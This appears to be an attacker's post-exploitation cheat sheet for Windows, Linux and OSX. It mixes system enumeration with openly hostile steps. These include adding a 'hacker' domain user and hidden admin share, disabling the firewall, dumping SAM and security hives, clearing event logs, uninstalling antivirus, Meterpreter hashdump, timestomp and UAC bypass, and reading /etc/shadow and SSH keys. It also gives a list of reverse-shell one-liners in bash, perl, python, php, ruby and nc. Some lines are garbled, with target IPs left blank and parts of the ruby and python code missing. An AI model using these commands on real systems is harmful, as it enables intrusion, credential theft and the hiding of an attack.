Windows Post Exploitation Command List

# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal %SYSTEMDRIVE%\boot.ini

# System ##example: COMMAND [syntax1] | [syntax2] (explanation1; explanation2) whoami whoami /all set qwinsta qprocess * at schtasks [/query /fo csv /v] net start sc getkeyname “Shell Hardware Detection” (use name from net start) sc qc ShellHWDetection (use keyname from getkeyname) net config workstation net time net file net session net use tasklist [/m] | [/svc] | [/m {dll}] fsutil fsinfo drives

# Networking ipconfig /all ipconfig /displaydns netstat -bano netstat -s -p [tcp|udp|icpm|ip] netstat -r netstat -na | findstr :445 netstat -nao | findstr LISTENING //comment: (XP and up for -o flag to get PID, zuk) netstat -na | findstr LISTENING (Any windows, generic) netsh diag show all net view net view /domain net view /domain:otherdomain net user hacker hacker /add /domain (adds a user to the curredomain -invasive-) net user %USERNAME% /domain net user /domain net accounts net accounts /domain net localgroup administrators net localgroup administrators /domain (as this was supposed to use localgroup&domain, this actually another way of getting *current* domain admins. Zuk) net group “domain admins” /domain net group “enterprise admins” /domain net group “domain controllers” /domain

nbtstat -a [ip_here] net share net session | find /c “\\” arp -a route print netsh firewall set opmode disable (turns off firewall -invasive-) netsh firewall set opmode enable (enables firewall -might cause loss of connection-)

# Configs gpresult /z sc qc [ Service name ] sc query sc queryex type %WINDIR%\System32\drivers\etc\hosts dir %PROGRAMFILES% echo %COMSPEC%

# Finding important files tree C:\ /f dir /a dir /b /s [Directory -- filename] Command |find /c /v “”

# Files to pull if possible %WINDIR%\repair\sam %WINDIR%\System32\drivers\etc\hosts

# Remote System Access net share \\computername tasklist /V /S computername net share nothing$=C:\ /grant:hacker,FULL /unlimited -invasive#net user hacker hacker /add #net localgroup administrators /add hacker #net use X: \\target\nothing$ hacker /USER:hacker qwinsta /SERVER:computername qprocess /SERVER:computername * net use \\computername (maps IPC$ which does not show up as a drive) net use \\computername /user:DOMAINNAME\username password (maps IPC$ under another username) net time \\computername (Shows the time of target computer) dir \\computername\share_or_admin_share\ (dir list a remote directory) tasklist /V /S computername Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to reinitiate the IPC$ mount

# WMI wmic bios wmic qfe wmic qfe get hotfixid (This gets patches IDs) wmic startup wmic service wmic os wmic process get caption,executablepath,commandline wmic process call create “process_name” (executes a program) wmic process where name=”process_name” call terminate (terminates program) wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information) wmic useraccount (usernames, sid, and various security related goodies) wmic useraccount get /ALL wmic share get /ALL (you can use ? for gets help ! ) wmic startup list full (this can be a huge list!!!) wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

Reg Command reg save HKLM\Security security.hive (Save security hive to a file) reg save HKLM\System system.hive (Save system hive to a file) reg save HKLM\SAM sam.hive (Save sam to a file)= reg add [\\TargetIPaddr\] [RegDomain][ \Key ] reg export [RegDomain]\[Key] [FileName]

reg import [FileName ] reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )

Deleting Logs wevtutil el (list logs) wevtutil cl <LogName> (Clear specific log) del %WINDIR%\*.log /a /s /q /f

Uninstalling Software “AntiVirus” (Non interactive) wmic product get name /value (this gets software names) wmic product where name="XXX" call uninstall /Interactive:Off (this uninstalls software)

# Other pkgmgr usefull /iu :”Package” pkgmgr usefull /iu :”TelnetServer” (Install Telnet Service ...) pkgmgr /iu:”TelnetClient” (Client ) rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-) wscript.exe <script js/vbs> cscript.exe <script js/vbs/c#>


# Win2k3 winpop stat domainname

# Vista/7 winstat features wbadmin get status wbadmin get items gpresult /H gpols.htm

(Page break just so we can have the straight up cmds on their own)

## Meterpreter Commands ps (show running processes and their associated users/id numbers) getuid getpid getprivs (shows current privileges) getsystem (attempts to get SYSTEM, be warned, attempts Kitrap0d local exploit as well) sysinfo

timestomp (Remove/screw up timestamps if you are good enough this messes up audit tools) clearev hashdump (dump SAM file hashes for pass the hash or cracking) or ‘run hashdump’ migrate [pid number] (Move from exploited process into another process)

## Useful Meterpreter Scripts

## Useful Meterpreter Post Modules vsploit post/windows/gather/smart_hashdump post/windows/gather/credentials/vnc post/windows/escalate/bypassuac (mixed results)

## Useful Techniques “Pass The Hash” attack (Gain access to other computers with stolen hashes, no cracking involved)

Change Wallpaper Ex: You have to upload a file called wallpaper.bmp to C: drive

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_MULTI_SZ /d "C:\wallpaper.bmp" rundll32.exe user32.dll,UpdatePerUserSystemParameters


-=SYSTEM=Command whoami Expected and / or Sample Output Returns the username you’re logged in as.


. Linux/Unix/BSD Post Exploitation Command List

# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal /etc/resolv.conf (everyone always has read on this and it wont trigger an IDS) /etc/motd, /etc/issue

# System

uname -a ps aux ps -aef id arch w who -a gcc -v mysql --version perl -v ruby -v python --version df -k mount last -a lastlog lastlogin (*bsd) getenforce dmesg lspci lsusb lshw free -m cat /proc/cpuinfo cat /proc/meminfo du -h --max-depth=1 /

which nmap (see if it’s already installed) locate bin/nmap which nc (see if it’s already installed) locate bin/<whatever you want> whoami jps -l

# Networking hostname -f ip addr show ifconfig -a route -n cat /etc/network/interfaces iptables -L -n netstat -anop netstat -r netstat -nltupw (root with raw sockets) arp -a lsof -nPi

# Configs cat /etc/issue{,.net} cat /etc/passwd

cat /etc/shadow (gotta try..) cat /etc/shadow~ # (sometimes there when edited with gedit) cat /etc/master.passwd cat /etc/group cat /etc/hosts cat /etc/crontab cat /etc/sysctl.conf for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons) cat /etc/resolv.conf cat /etc/lsb-release cat /etc/redhat-release cat /etc/samba/smb.conf pdbedit -L -w pdbedit -L -v cat /etc/exports cat /etc/auto.master cat /etc/auto_master cat /etc/fstab cat /etc/exports find /etc/sysconfig/ -type f -exec cat {} \; cat /etc/sudoers

# Determine Distro: /etc/SUSE-release /etc/redhat-release, /etc/redhat_version # Novell SUSE # Red Hat

/etc/fedora-release /etc/slackware-release, /etc/slackware-version /etc/debian_release, /etc/debian_version, /etc/mandrake-release /etc/sun-release /etc/release /etc/gentoo-release /etc/lsb-release ??

# Fedora # Slackware # Debian # Mandrake # Sun JDS # Solaris/Sparc # Gentoo # ubuntu # arch linux

arch # on OpenBSD sample: OpenBSD.amd64 uname -a (often hints at it pretty well)

# Installed Packages rpm -qa --last | head yum list | grep installed dpkg -l dpkg -l |grep -i “linux-image” pkg_info # FreeBSD

#Package Sources cat /etc/apt/sources.list ls -l /etc/yum.repos.d/

cat /etc/yum.conf

# Finding Important Files find /var/log -type f -exec ls -la {} \; ls -alhtr /mnt ls -alhtr /media ls -alhtr /tmp ls -alhtr /home ls /home/*/.ssh/* find /home -type f -iname '.*history' ls -lart /etc/rc.d/ locate tar | grep [.]tar$ locate tgz | grep [.]tgz$ locate sql l grep [.]sql$ locate settings | grep [.]php$ locate | grep [.]php$ ls /home/*/id* locate .properties | grep [.]properties # java config files locate .xml | grep [.]xml # java/.net config files find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm -4000 # find suids

## Per User ls -alh /home/*/ ls -alh /home/*/.ssh/

cat /home/*/.ssh/authorized_keys cat /home/*/.ssh/known_hosts cat /home/*/.*hist* find -type f /home/*/.vnc /home/*/.subversion grep ^ssh /home/*/.*hist* grep ^telnet `/home/*/.*hist* grep ^mysql /home/*/.*hist* cat /home/*/.viminfo sudo -l # if sudoers is not readable, this sometimes works per user crontab -l

## Priv (sudo’d or as root) ls -alh /root/ cat /etc/sudoers cat /etc/shadow cat /etc/master.passwd # OpenBSD cat /var/spool/cron/crontabs/* lsof -nPi ls /home/*/.ssh/*

## Reverse Shell starting list sourced from: bash -i >& /dev/tcp/ 0>&1

perl -e 'use Socket;$i=""; $p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect (S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/s h -i");};' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) ;s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);' php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ruby -rsocket -e'"",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 1234 # note need -l on some versions, and many does NOT support -e anymore rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f xterm -display ListenerXnest :1

Add permission to connect- xhost +victimIP

## GOING TO MOVE EVERYTHING HERE FOR LEDGIBILITY ONCE EDITING DIES DOWN -=SYSTEM=Command uname -a ps aux id w Expected and / or Sample Output Linux kernel version, distribution List of running processes

List current user and group along with user/group id Show about who is logged,they are doing

who -a

Print information about about users

OSX Post Exploitation Command List

# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal /etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)

#SYSTEM uname -a sw_vers -productName sw_vers -productVersion system_profiler id printenv who ps aux ps ea ls -alh /Applications/ /Library/Application Support/VMware Fusion/vmrun list /Library/Application Support/VMware Fusion/vmrun CopyFileFromHostToGuest windowsmalicious.exe WindowsVM /Library/Application Support/VMware Fusion/vmrun captureScreen

WindowsVM Snow Leopard and Lion dscacheutil -q user dscacheutil -q group Tiger lookupd -q user lookupd -q group

#Networking ifconfig netstat -np tcp netstat -np udp

#Configs ls -alh /private/etc/

#Finding Important Files ls -ma ~/ ls -alh /Users/ ls -alh /Users/*/.ssh/ ls -alh /Users/*/.gnupg/

#Files to pull

#Remote System Access

#Priv cat /Library/Application Support/Objective Development/Little Snitch/rules.xpl ls /Library/Application Support/VMware Fusion/licenses/site/